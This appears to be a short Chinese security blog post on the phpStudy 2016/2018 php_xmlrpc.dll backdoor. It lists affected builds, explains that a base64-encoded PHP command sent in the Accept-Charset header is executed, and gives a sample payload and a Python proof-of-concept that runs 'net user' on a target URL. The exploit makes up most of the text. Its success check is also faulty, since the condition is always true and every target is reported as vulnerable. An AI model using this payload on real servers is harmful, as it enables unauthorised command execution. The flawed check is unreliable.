漏洞影响版本:
- phpStudy2016
- php\php-5.2.17\ext\php_xmlrpc.dll
- php\php-5.4.45\ext\php_xmlrpc.dll
- phpStudy2018
- PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
- PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll
漏洞前提:
- 引用了php_xmlrpc.dll文件且文件存在@eval(%s(‘%s’))
漏洞验证:
-
Accept-Encoding要把gzip, deflate 里逗号后面的空格去掉,不然命令执行不成功
-
Accept-Charset 的值就是执行的命令, 需要进行base64编码
-
构造Payload:
// 执行命令 system('ipconfig') ; accept-charset:c3lzdGVtKCdpcGNvbmZpZycpIDs=
验证脚本:
# -*-coding:utf-8 -*-
import requests
import sys
import base64
def Poc(ip):
payload = "echo \"hello phpstudy\";"
poc = "ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7"
pay = base64.b64encode(payload.encode('utf-8'))
#poc = str(pay,"utf-8")
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Connection": "close",
"Accept-Encoding": "gzip,deflate",
"Accept-Charset": poc,
"Upgrade-Insecure-Requests": "1",
}
url = ip
r = requests.get(url,headers=headers)
#print(r.text)
if "Administrator" or "DefaultAccount" in r.text:
print("存在phpstudy后门")
else:
print("不存在phpstudy后门")
if len(sys.argv) < 2:
print("python phpstudy.py http://127.0.0.1")
else:
Poc(sys.argv[1])
MS08067安全实验室
Frieza
